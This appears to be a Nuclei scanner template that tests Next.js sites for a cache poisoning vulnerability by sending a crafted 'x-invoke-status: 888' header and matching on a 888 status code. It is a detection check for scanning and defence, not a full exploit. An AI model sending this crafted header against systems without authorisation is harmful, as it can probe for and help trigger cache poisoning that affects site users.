id: nextjs-x-invoke-status-header

info:
  name: Next.js Cache Poisoning Vulnerability
  author: shdwpwn
  severity: high
  reference: https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
  tags: nextjs,cache
  
http:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      x-invoke-status: "888"
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
      
    matchers:
      - type: status
        status:
          - 888